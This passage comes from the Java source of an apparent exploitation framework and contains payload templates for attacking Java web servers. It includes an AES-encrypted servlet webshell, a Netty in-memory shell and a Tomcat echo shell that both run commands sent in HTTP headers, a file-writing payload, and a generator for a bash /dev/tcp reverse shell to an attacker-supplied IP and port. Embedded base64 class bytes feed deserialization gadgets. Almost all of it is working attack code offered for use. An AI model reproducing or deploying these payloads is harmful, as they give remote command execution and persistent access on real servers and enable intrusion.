(request.getMethod().equals("POST")){ 53 | String k = behinderShellPwd; 54 | request.getSession().setAttribute("u",k); 55 | Cipher cipher = Cipher.getInstance("AES"); 56 | cipher.init(2, new SecretKeySpec((request.getSession().getAttribute("u") + "").getBytes(), "AES")); 57 | byte[] evilClassBytes = cipher.doFinal(new BASE64Decoder().decodeBuffer(request.getReader().readLine())); 58 | Class evilClass = (Class) myClassLoaderClazz.getDeclaredMethod("defineClass", byte[].class, ClassLoader.class).invoke(null, evilClassBytes, Thread.currentThread().getContextClassLoader()); 59 | Object evilObject = evilClass.newInstance(); 60 | Method targetMethod = evilClass.getDeclaredMethod("equals", new Class[]{ServletRequest.class, ServletResponse.class}); 61 | targetMethod.invoke(evilObject, new Object[]{request, response}); 62 | } 63 | }catch(Exception e){ 64 | e.printStackTrace(); 65 | } 66 | 67 | return false; 68 | } 69 | 70 | return true; 71 | } 72 | 73 | private void initialize(){ 74 | try{ 75 | ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); 76 | try{ 77 | this.myClassLoaderClazz = classLoader.loadClass("com.feihong.ldap.template.MyClassLoader"); 78 | } catch (ClassNotFoundException e) { 79 | String code = "yv66vgAAADIAGwoABQAWBwAXCgACABYKAAIAGAcAGQEABjxpbml0PgEAGihMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAClMY29tL2ZlaWhvbmcvbGRhcC90ZW1wbGF0ZS9NeUNsYXNzTG9hZGVyOwEAAWMBABdMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAC2RlZmluZUNsYXNzAQAsKFtCTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspTGphdmEvbGFuZy9DbGFzczsBAAVieXRlcwEAAltCAQALY2xhc3NMb2FkZXIBAApTb3VyY2VGaWxlAQASTXlDbGFzc0xvYWRlci5qYXZhDAAGAAcBACdjb20vZmVpaG9uZy9sZGFwL3RlbXBsYXRlL015Q2xhc3NMb2FkZXIMAA8AGgEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAFyhbQklJKUxqYXZhL2xhbmcvQ2xhc3M7ACEAAgAFAAAAAAACAAAABgAHAAEACAAAADoAAgACAAAABiortwABsQAAAAIACQAAAAYAAQAAAAQACgAAABYAAgAAAAYACwAMAAAAAAAGAA0ADgABAAkADwAQAAEACAAAAEQABAACAAAAELsAAlkrtwADKgMqvrYABLAAAAACAAkAAAAGAAEAAAAIAAoAAAAWAAIAAAAQABEAEgAAAAAAEAATAA4AAQABABQAAAACABU="; 80 | byte[] bytes = new BASE64Decoder().decodeBuffer(code); 81 | 82 | Method method = null; 83 | try { 84 | method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); 85 | method.setAccessible(true); 86 | this.myClassLoaderClazz = (Class) method.invoke(classLoader, bytes, 0, bytes.length); 87 | } catch (NoSuchMethodException ex) { 88 | ex.printStackTrace(); 89 | } 90 | } 91 | } catch (IllegalAccessException e) { 92 | e.printStackTrace(); 93 | } catch (IOException e) { 94 | e.printStackTrace(); 95 | } catch (InvocationTargetException e) { 96 | e.printStackTrace(); 97 | } 98 | } 99 | } 100 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/MyClassLoader.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | public class MyClassLoader extends ClassLoader { 4 | MyClassLoader(ClassLoader c){super(c);} 5 | 6 | 7 | public static Class defineClass(byte[] bytes, ClassLoader classLoader){ 8 | return new MyClassLoader(classLoader).defineClass(bytes, 0, bytes.length); 9 | } 10 | } 11 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/NettyMemshellTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import io.netty.buffer.Unpooled; 4 | import io.netty.channel.*; 5 | import io.netty.handler.codec.http.*; 6 | import io.netty.util.CharsetUtil; 7 | import reactor.netty.ChannelPipelineConfigurer; 8 | import reactor.netty.ConnectionObserver; 9 | 10 | import java.lang.reflect.Array; 11 | import java.lang.reflect.Field; 12 | import java.lang.reflect.Method; 13 | import java.net.SocketAddress; 14 | import java.util.Scanner; 15 | 16 | public class NettyMemshellTemplate extends ChannelDuplexHandler implements ChannelPipelineConfigurer { 17 | public static Object nettymemshell; 18 | public NettyMemshellTemplate(){ 19 | nettymemshell = new NettyMemshellTemplate(""); 20 | doInject(); 21 | } 22 | public NettyMemshellTemplate(String a){ 23 | 24 | } 25 | public static String doInject(){ 26 | String msg = "inject-start"; 27 | try { 28 | Method getThreads = Thread.class.getDeclaredMethod("getThreads"); 29 | getThreads.setAccessible(true); 30 | Object threads = getThreads.invoke(null); 31 | 32 | for (int i = 0; i < Array.getLength(threads); i++) { 33 | Object thread = Array.get(threads, i); 34 | if (thread != null && thread.getClass().getName().contains("NettyWebServer")) { 35 | Field _val$disposableServer = thread.getClass().getDeclaredField("val$disposableServer"); 36 | _val$disposableServer.setAccessible(true); 37 | Object val$disposableServer = _val$disposableServer.get(thread); 38 | Field _config = val$disposableServer.getClass().getSuperclass().getDeclaredField("config"); 39 | _config.setAccessible(true); 40 | Object config = _config.get(val$disposableServer); 41 | Field _doOnChannelInit = config.getClass().getSuperclass().getSuperclass().getDeclaredField("doOnChannelInit"); 42 | _doOnChannelInit.setAccessible(true); 43 | _doOnChannelInit.set(config, nettymemshell); 44 | msg = "inject-success"; 45 | return "msg"; 46 | } 47 | } 48 | }catch (Exception e){ 49 | msg = "inject-error"; 50 | } 51 | return msg; 52 | } 53 | 54 | @Override 55 | // Step1. 作为一个ChannelPipelineConfigurer给pipline注册Handler 56 | public void onChannelInit(ConnectionObserver connectionObserver, Channel channel, SocketAddress socketAddress) { 57 | ChannelPipeline pipeline = channel.pipeline(); 58 | // 将内存马的handler添加到spring层handler的前面 59 | pipeline.addBefore("reactor.left.httpTrafficHandler","memshell_handler",new NettyMemshellTemplate()); 60 | } 61 | 62 | 63 | @Override 64 | // Step2. 作为Handler处理请求,在此实现内存马的功能逻辑 65 | public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception { 66 | if(msg instanceof HttpRequest){ 67 | HttpRequest httpRequest = (HttpRequest)msg; 68 | try { 69 | if(httpRequest.headers().contains("X-CMD")) { 70 | String cmd = httpRequest.headers().get("X-CMD"); 71 | String execResult = new Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); 72 | // 返回执行结果 73 | send(ctx, execResult, HttpResponseStatus.OK); 74 | return; 75 | } 76 | }catch (Exception e){ 77 | e.printStackTrace(); 78 | } 79 | } 80 | ctx.fireChannelRead(msg); 81 | } 82 | 83 | 84 | private void send(ChannelHandlerContext ctx, String context, HttpResponseStatus status) { 85 | FullHttpResponse response = new DefaultFullHttpResponse(HttpVersion.HTTP_1_1, status, Unpooled.copiedBuffer(context, CharsetUtil.UTF_8)); 86 | response.headers().set(HttpHeaderNames.CONTENT_TYPE, "text/plain; charset=UTF-8"); 87 | ctx.writeAndFlush(response).addListener(ChannelFutureListener.CLOSE); 88 | } 89 | 90 | public static void main(String[] args) { 91 | 92 | } 93 | } -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/PutfileTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | import com.achuna33.Utils.*; 3 | import org.objectweb.asm.*; 4 | import com.achuna33.SupportType.MyDIYType; 5 | 6 | import javax.xml.bind.DatatypeConverter; 7 | 8 | import java.io.FileOutputStream; 9 | import java.io.IOException; 10 | import java.util.Arrays; 11 | 12 | import static org.objectweb.asm.Opcodes.*; 13 | import static org.objectweb.asm.Opcodes.RETURN; 14 | 15 | public class PutfileTemplate implements Template{ 16 | private String className; 17 | private byte[] bytes; 18 | private String Path; 19 | private String Content; 20 | public PutfileTemplate(String Path,String Content){ 21 | this.Path = new String(Utils.Base64DecodeStr2bytes(Path)); 22 | this.className = "WriteFile"; 23 | this.Content = Content; 24 | generate(); 25 | } 26 | public void cache(){ 27 | Cache.set(className, bytes); 28 | } 29 | public String getClassName(){ 30 | return className; 31 | } 32 | public byte[] getBytes(){ 33 | return bytes; 34 | } 35 | public void generate() { 36 | String WriteFileClassBase64 = "yv66vgAAADIAeAoAIAA4CQAfADkKAB8AOgcAOwkAHwA8CgAEAD0KAAQAPgcAPwoACABACABBCgAMAEIHAEMKAAwARAoARQBGBwBHCgBFAEgKAA8ASQgASgcASwoADABMCgBNAEYKAE4ATwoATQBQBwBRCABSCQBTAFQKAFMAVQgAVgoADABXCgAYAEAHAFgHAFkBAARQYXRoAQASTGphdmEvbGFuZy9TdHJpbmc7AQANQ29udGVudGJhc2U2NAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAA1TdGFja01hcFRhYmxlBwBYBwA/AQAVQmFzZTY0RGVjb2RlU3RyMmJ5dGVzAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgcAWgcAQwcAUQcAUQEACXRyYW5zZm9ybQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApFeGNlcHRpb25zBwBbAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAKU291cmNlRmlsZQEADldyaXRlRmlsZS5qYXZhDAAkACUMACMAIgwAKwAsAQAYamF2YS9pby9GaWxlT3V0cHV0U3RyZWFtDAAhACIMACQAXAwAXQBeAQATamF2YS9pby9JT0V4Y2VwdGlvbgwAXwAlAQAgamF2YXgueG1sLmJpbmQuRGF0YXR5cGVDb252ZXJ0ZXIMAGAAYQEAD2phdmEvbGFuZy9DbGFzcwwAYgBjBwBkDABlAGYBABBqYXZhL2xhbmcvT2JqZWN0DABnAGgMAGkAagEAEXBhcnNlQmFzZTY0QmluYXJ5AQACW0IMAGsAbAcAbQcAWgwAbgBvDABwAHEBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAYamF2YS51dGlsLkJhc2U2NCREZWNvZGVyBwByDABzAHQMAHUAdgEABmRlY29kZQwAdwBsAQAJV3JpdGVGaWxlAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAEGphdmEvbGFuZy9TdHJpbmcBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAV3cml0ZQEABShbQilWAQAPcHJpbnRTdGFja1RyYWNlAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABZnZXREZWNsYXJlZENvbnN0cnVjdG9yAQAzKFtMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3I7AQAdamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3IBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAC25ld0luc3RhbmNlAQAnKFtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAIZ2V0Qnl0ZXMBAAQoKVtCAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQARamF2YS9sYW5nL0Jvb2xlYW4BAARUWVBFAQARTGphdmEvbGFuZy9DbGFzczsBAAd2YWx1ZU9mAQAWKFopTGphdmEvbGFuZy9Cb29sZWFuOwEACWdldE1ldGhvZAAhAB8AIAAAAAIACgAhACIAAAAKACMAIgAAAAQAAQAkACUAAQAmAAAAegADAAMAAAAlKrcAASqyAAK2AANMuwAEWbIABbcABk0sK7YAB6cACE0stgAJsQABAAwAHAAfAAgAAgAnAAAAIgAIAAAADQAEAA4ADAAQABcAEQAcABQAHwASACAAEwAkABUAKAAAABMAAv8AHwACBwApBwATAAEHACoEAAEAKwAsAAEAJgAAAZAABgAIAAAA2gFNAU4SCrgAC04tA70ADLYADToEGQQEtgAOGQQDvQAPtgAQOgUZBbYAERISBL0ADFkDEwATU7YAFDoGGQYEtgAVGQYZBQS9AA9ZAyu2ABZTtgAXwAATwAATTSywOgQSGbgAC04tBb0ADFkDsgAaU1kEsgAaU7YADToFGQUEtgAOGQUFvQAPWQMDuAAbU1kEA7gAG1O2ABA6BhkGtgAREhwEvQAMWQMTABNTtgAdOgcZBwS2ABUZBxkGBL0AD1kDK7YAFlO2ABfAABPAABNNpwAKOgUZBbYAHiywAAIABABbAFwAGABeAM4A0QAYAAIAJwAAAFoAFgAAABcAAgAYAAQAGgAKABsAFAAcABoAHQAlAB4AOwAfAEEAIABaACEAXAAiAF4AJABkACUAegAmAIAAJwCZACgArwApALUAKgDOAC0A0QArANMALADYADAAKAAAADQAA/8AXAAEBwApBwAtBwATBwAuAAEHAC//AHQABQcAKQcALQcAEwcALgcAMAABBwAv+gAGAAEAMQAyAAIAJgAAABkAAAAEAAAAAbEAAAABACcAAAAGAAEAAAAzADMAAAAEAAEANAABADEANQACACYAAAAZAAAAAwAAAAGxAAAAAQAnAAAABgABAAAANQAzAAAABAABADQAAQA2AAAAAgA3"; 37 | ClassReader cr = null; 38 | cr = new ClassReader(Utils.Base64DecodeStr2bytes(WriteFileClassBase64)); 39 | ClassWriter cw = new ClassWriter(cr, ClassWriter.COMPUTE_MAXS); 40 | ASMChanger.ModifyAccessVisitor mv = new ASMChanger.ModifyAccessVisitor(ASM6,cw,MyDIYType.PutFile,"",Path,Content); 41 | cr.accept(mv,ClassReader.SKIP_FRAMES); 42 | bytes = cw.toByteArray(); 43 | 44 | } 45 | public static void fileOutputStreamMethod(String filepath, byte[] content) throws IOException { 46 | try { 47 | FileOutputStream fileOutputStream = new FileOutputStream(filepath); 48 | byte[] bytes = content; 49 | fileOutputStream.write(bytes); 50 | }catch (Exception e){ 51 | e.printStackTrace(); 52 | } 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/ReverseShellTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import com.achuna33.Utils.*; 4 | import org.objectweb.asm.*; 5 | import static org.objectweb.asm.Opcodes.*; 6 | 7 | public class ReverseShellTemplate implements Template { 8 | private String className; 9 | private byte[] bytes; 10 | private String ip; 11 | private int port; 12 | 13 | public ReverseShellTemplate(String ip, String port){ 14 | this(ip, Integer.parseInt(port)); 15 | } 16 | 17 | 18 | public ReverseShellTemplate(String ip, int port){ 19 | this.ip = ip; 20 | this.port = port; 21 | this.className = "Exploit" + Utils.getRandomString(4); 22 | 23 | generate(); 24 | } 25 | 26 | public ReverseShellTemplate(String ip, String port, String className){ 27 | this(ip, Integer.parseInt(port)); 28 | this.className = className; 29 | 30 | generate(); 31 | } 32 | 33 | @Override 34 | public String getClassName(){ 35 | return className; 36 | } 37 | 38 | @Override 39 | public byte[] getBytes() { 40 | return bytes; 41 | } 42 | 43 | @Override 44 | public void cache() { 45 | Cache.set(className, bytes); 46 | } 47 | 48 | @Override 49 | public void generate() { 50 | ClassWriter cw = new ClassWriter(0); 51 | FieldVisitor fv; 52 | MethodVisitor mv; 53 | AnnotationVisitor av0; 54 | 55 | cw.visit(V1_6, ACC_PUBLIC + ACC_SUPER, className, null, "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet", null); 56 | 57 | 58 | { 59 | fv = cw.visitField(ACC_PRIVATE, "ip", "Ljava/lang/String;", null, null); 60 | fv.visitEnd(); 61 | } 62 | { 63 | fv = cw.visitField(ACC_PRIVATE, "port", "I", null, null); 64 | fv.visitEnd(); 65 | } 66 | { 67 | mv = cw.visitMethod(ACC_PUBLIC, "", "()V", null, null); 68 | mv.visitCode(); 69 | Label l0 = new Label(); 70 | Label l1 = new Label(); 71 | Label l2 = new Label(); 72 | mv.visitTryCatchBlock(l0, l1, l2, "java/lang/Exception"); 73 | Label l3 = new Label(); 74 | mv.visitLabel(l3); 75 | mv.visitLineNumber(12, l3); 76 | mv.visitVarInsn(ALOAD, 0); 77 | mv.visitMethodInsn(INVOKESPECIAL, "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet", "", "()V", false); 78 | Label l4 = new Label(); 79 | mv.visitLabel(l4); 80 | mv.visitLineNumber(13, l4); 81 | mv.visitFieldInsn(GETSTATIC, "java/io/File", "separator", "Ljava/lang/String;"); 82 | mv.visitLdcInsn("/"); 83 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/String", "equals", "(Ljava/lang/Object;)Z", false); 84 | Label l5 = new Label(); 85 | mv.visitJumpInsn(IFEQ, l5); 86 | Label l6 = new Label(); 87 | mv.visitLabel(l6); 88 | mv.visitLineNumber(14, l6); 89 | mv.visitInsn(ICONST_3); 90 | mv.visitTypeInsn(ANEWARRAY, "java/lang/String"); 91 | mv.visitInsn(DUP); 92 | mv.visitInsn(ICONST_0); 93 | mv.visitLdcInsn("/bin/bash"); 94 | mv.visitInsn(AASTORE); 95 | mv.visitInsn(DUP); 96 | mv.visitInsn(ICONST_1); 97 | mv.visitLdcInsn("-c"); 98 | mv.visitInsn(AASTORE); 99 | mv.visitInsn(DUP); 100 | mv.visitInsn(ICONST_2); 101 | mv.visitLdcInsn("/bin/bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1"); 102 | mv.visitInsn(AASTORE); 103 | mv.visitVarInsn(ASTORE, 1); 104 | mv.visitLabel(l0); 105 | mv.visitLineNumber(16, l0); 106 | mv.visitMethodInsn(INVOKESTATIC, "java/lang/Runtime", "getRuntime", "()Ljava/lang/Runtime;", false); 107 | mv.visitVarInsn(ALOAD, 1); 108 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/Runtime", "exec", "([Ljava/lang/String;)Ljava/lang/Process;", false); 109 | mv.visitInsn(POP); 110 | mv.visitLabel(l1); 111 | mv.visitLineNumber(19, l1); 112 | mv.visitJumpInsn(GOTO, l5); 113 | mv.visitLabel(l2); 114 | mv.visitLineNumber(17, l2); 115 | mv.visitFrame(Opcodes.F_FULL, 2, new Object[]{className, "[Ljava/lang/String;"}, 1, new Object[]{"java/lang/Exception"}); 116 | mv.visitVarInsn(ASTORE, 2); 117 | Label l7 = new Label(); 118 | mv.visitLabel(l7); 119 | mv.visitLineNumber(18, l7); 120 | mv.visitVarInsn(ALOAD, 2); 121 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/Exception", "printStackTrace", "()V", false); 122 | mv.visitLabel(l5); 123 | mv.visitLineNumber(22, l5); 124 | mv.visitFrame(Opcodes.F_CHOP, 1, null, 0, null); 125 | mv.visitInsn(RETURN); 126 | Label l8 = new Label(); 127 | mv.visitLabel(l8); 128 | mv.visitLocalVariable("e", "Ljava/lang/Exception;", null, l7, l5, 2); 129 | mv.visitLocalVariable("command", "[Ljava/lang/String;", null, l0, l5, 1); 130 | mv.visitLocalVariable("this", "LReverseShell;", null, l3, l8, 0); 131 | mv.visitMaxs(4, 3); 132 | mv.visitEnd(); 133 | } 134 | { 135 | mv = cw.visitMethod(ACC_PUBLIC, "transform", "(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)V", null, new String[]{"com/sun/org/apache/xalan/internal/xsltc/TransletException"}); 136 | mv.visitCode(); 137 | Label l0 = new Label(); 138 | mv.visitLabel(l0); 139 | mv.visitLineNumber(27, l0); 140 | mv.visitInsn(RETURN); 141 | Label l1 = new Label(); 142 | mv.visitLabel(l1); 143 | mv.visitLocalVariable("this", "LReverseShell;", null, l0, l1, 0); 144 | mv.visitLocalVariable("document", "Lcom/sun/org/apache/xalan/internal/xsltc/DOM;", null, l0, l1, 1); 145 | mv.visitLocalVariable("handlers", "[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;", null, l0, l1, 2); 146 | mv.visitMaxs(0, 3); 147 | mv.visitEnd(); 148 | } 149 | { 150 | mv = cw.visitMethod(ACC_PUBLIC, "transform", "(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)V", null, new String[]{"com/sun/org/apache/xalan/internal/xsltc/TransletException"}); 151 | mv.visitCode(); 152 | Label l0 = new Label(); 153 | mv.visitLabel(l0); 154 | mv.visitLineNumber(32, l0); 155 | mv.visitInsn(RETURN); 156 | Label l1 = new Label(); 157 | mv.visitLabel(l1); 158 | mv.visitLocalVariable("this", "LReverseShell;", null, l0, l1, 0); 159 | mv.visitLocalVariable("document", "Lcom/sun/org/apache/xalan/internal/xsltc/DOM;", null, l0, l1, 1); 160 | mv.visitLocalVariable("iterator", "Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;", null, l0, l1, 2); 161 | mv.visitLocalVariable("handler", "Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;", null, l0, l1, 3); 162 | mv.visitMaxs(0, 4); 163 | mv.visitEnd(); 164 | } 165 | cw.visitEnd(); 166 | bytes = cw.toByteArray(); 167 | } 168 | 169 | } 170 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/Template.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | public interface Template { 4 | void generate(); 5 | byte[] getBytes(); 6 | void cache(); 7 | String getClassName(); 8 | } 9 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/TomcatEchoTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.DOM; 4 | import com.sun.org.apache.xalan.internal.xsltc.TransletException; 5 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 6 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 7 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 8 | import java.lang.reflect.Field; 9 | import java.util.List; 10 | import java.util.Scanner; 11 | 12 | public class TomcatEchoTemplate extends AbstractTranslet { 13 | 14 | public TomcatEchoTemplate(){ 15 | try{ 16 | boolean var4 = false; 17 | Thread[] var5 = (Thread[])getFV(Thread.currentThread().getThreadGroup(), "threads"); 18 | 19 | for(int var6 = 0; var6 < var5.length; ++var6) { 20 | Thread var7 = var5[var6]; 21 | if (var7 != null) { 22 | String var3 = var7.getName(); 23 | if (!var3.contains("exec") && var3.contains("http")) { 24 | Object var1 = getFV(var7, "target"); 25 | if (var1 instanceof Runnable) { 26 | try { 27 | var1 = getFV(getFV(getFV(var1, "this$0"), "handler"), "global"); 28 | } catch (Exception var13) { 29 | continue; 30 | } 31 | 32 | List var9 = (List)getFV(var1, "processors"); 33 | 34 | for(int var10 = 0; var10 < var9.size(); ++var10) { 35 | Object var11 = var9.get(var10); 36 | var1 = getFV(var11, "req"); 37 | Object var2 = var1.getClass().getMethod("getResponse").invoke(var1); 38 | var3 = (String)var1.getClass().getMethod("getHeader", String.class).invoke(var1, "Testecho"); 39 | if (var3 != null && !var3.isEmpty()) { 40 | var2.getClass().getMethod("setStatus", Integer.TYPE).invoke(var2, new Integer(200)); 41 | var2.getClass().getMethod("addHeader", String.class, String.class).invoke(var2, "Testecho", var3); 42 | var4 = true; 43 | } 44 | 45 | var3 = (String)var1.getClass().getMethod("getHeader", String.class).invoke(var1, "cmd"); 46 | if (var3 != null && !var3.isEmpty()) { 47 | var2.getClass().getMethod("setStatus", Integer.TYPE).invoke(var2, new Integer(200)); 48 | String[] var12 = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", var3} : new String[]{"/bin/sh", "-c", var3}; 49 | writeBody(var2, (new Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter("\\A").next().getBytes()); 50 | var4 = true; 51 | } 52 | 53 | if ((var3 == null || var3.isEmpty()) && var4) { 54 | writeBody(var2, System.getProperties().toString().getBytes()); 55 | } 56 | 57 | if (var4) { 58 | break; 59 | } 60 | } 61 | 62 | if (var4) { 63 | break; 64 | } 65 | } 66 | } 67 | } 68 | } 69 | }catch (Exception e){ 70 | e.printStackTrace(); 71 | } 72 | } 73 | 74 | private static void writeBody(Object var0, byte[] var1) throws Exception { 75 | Object var2; 76 | Class var3; 77 | try { 78 | var3 = Class.forName("org.apache.tomcat.util.buf.ByteChunk"); 79 | var2 = var3.newInstance(); 80 | var3.getDeclaredMethod("setBytes", byte[].class, Integer.TYPE, Integer.TYPE).invoke(var2, var1, new Integer(0), new Integer(var1.length)); 81 | var0.getClass().getMethod("doWrite", var3).invoke(var0, var2); 82 | } catch (NoSuchMethodException var5) { 83 | var3 = Class.forName("java.nio.ByteBuffer"); 84 | var2 = var3.getDeclaredMethod("wrap", byte[].class).invoke(var3, var1); 85 | var0.getClass().getMethod("doWrite", var3).invoke(var0, var2); 86 | } 87 | 88 | } 89 | 90 | private static Object getFV(Object var0, String var1) throws Exception { 91 | Field var2 = null; 92 | Class var3 = var0.getClass(); 93 | 94 | while(var3 != Object.class) { 95 | try { 96 | var2 = var3.getDeclaredField(var1); 97 | break; 98 | } catch (NoSuchFieldException var5) { 99 | var3 = var3.getSuperclass(); 100 | } 101 | } 102 | 103 | if (var2 == null) { 104 | throw new NoSuchFieldException(var1); 105 | } else { 106 | var2.setAccessible(true); 107 | return var2.get(var0); 108 | } 109 | } 110 | 111 | @Override 112 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { 113 | 114 | } 115 | 116 | @Override 117 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { 118 | 119 | } 120 | } 121 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/myClassTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import com.achuna33.SupportType.MyDIYType; 4 | import com.achuna33.Utils.ASMChanger; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.Utils; 7 | import org.objectweb.asm.ClassReader; 8 | import org.objectweb.asm.ClassWriter; 9 | 10 | import java.io.File; 11 | import java.io.FileInputStream; 12 | import java.io.FileOutputStream; 13 | import java.io.IOException; 14 | 15 | import static org.objectweb.asm.Opcodes.ASM6; 16 | 17 | public class myClassTemplate implements Template{ 18 | private String className; 19 | private byte[] bytes; 20 | public myClassTemplate(String className){ 21 | 22 | this.className = className; 23 | generate(); 24 | } 25 | public void cache(){ 26 | Cache.set(className, bytes); 27 | } 28 | public String getClassName(){ 29 | return className; 30 | } 31 | public byte[] getBytes(){ 32 | return bytes; 33 | } 34 | public void generate() { 35 | 36 | try{ 37 | 38 | String path = System.getProperty("user.dir") + File.separator + "lib" + File.separator + className+".class"; 39 | 40 | FileInputStream fis = new FileInputStream(path); 41 | byte[] buf = new byte[fis.available()]; 42 | System.out.println("[*]In Your path:"+path); 43 | System.out.println("[* File Size :"+String.valueOf(fis.available()) ); 44 | fis.read(buf); 45 | fis.close(); 46 | 47 | bytes = buf; 48 | }catch (Exception e){ 49 | e.printStackTrace(); 50 | } 51 | } 52 | public static void fileOutputStreamMethod(String filepath, byte[] content) throws IOException { 53 | try { 54 | FileOutputStream fileOutputStream = new FileOutputStream(filepath); 55 | byte[] bytes = content; 56 | fileOutputStream.write(bytes); 57 | }catch (Exception e){ 58 | e.printStackTrace(); 59 | } 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Update/Update.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Update; 2 | 3 | import com.achuna33.Utils.Cache; 4 | import com.achuna33.Utils.HttpRequest; 5 | import com.achuna33.Utils.Response; 6 | 7 | import javax.net.ssl.*; 8 | import java.io.*; 9 | import java.net.HttpURLConnection; 10 | import java.net.MalformedURLException; 11 | import java.net.StandardSocketOptions; 12 | import java.net.URL; 13 | import java.nio.charset.Charset; 14 | import java.security.SecureRandom; 15 | import java.security.cert.CertificateException; 16 | import java.security.cert.X509Certificate; 17 | 18 | import static com.achuna33.Utils.Cache.WriteLogBase; 19 | 20 | public class Update extends Thread{ 21 | public Update(){} 22 | @Override 23 | public void run(){ 24 | try { 25 | goUpdate(); 26 | }catch (Exception e){} 27 | } 28 | public void goUpdate() throws MalformedURLException { 29 | WriteLogBase("\n[*]开始下载"); 30 | HttpRequest httpRequest = new HttpRequest("https://github.com/zhaoyumi/MYExploit/blob/main/NewVersionUrl"); 31 | Response response = httpRequest.Get(""); 32 | if (response.statusCode==0){ 33 | WriteLogBase("\n[*]连接超时"); 34 | return; 35 | } 36 | try { 37 | String url = response.responseBody.split("")[1].split("")[0]; 38 | String path = this.getClass().getProtectionDomain().getCodeSource().getLocation().getPath(); 39 | path = 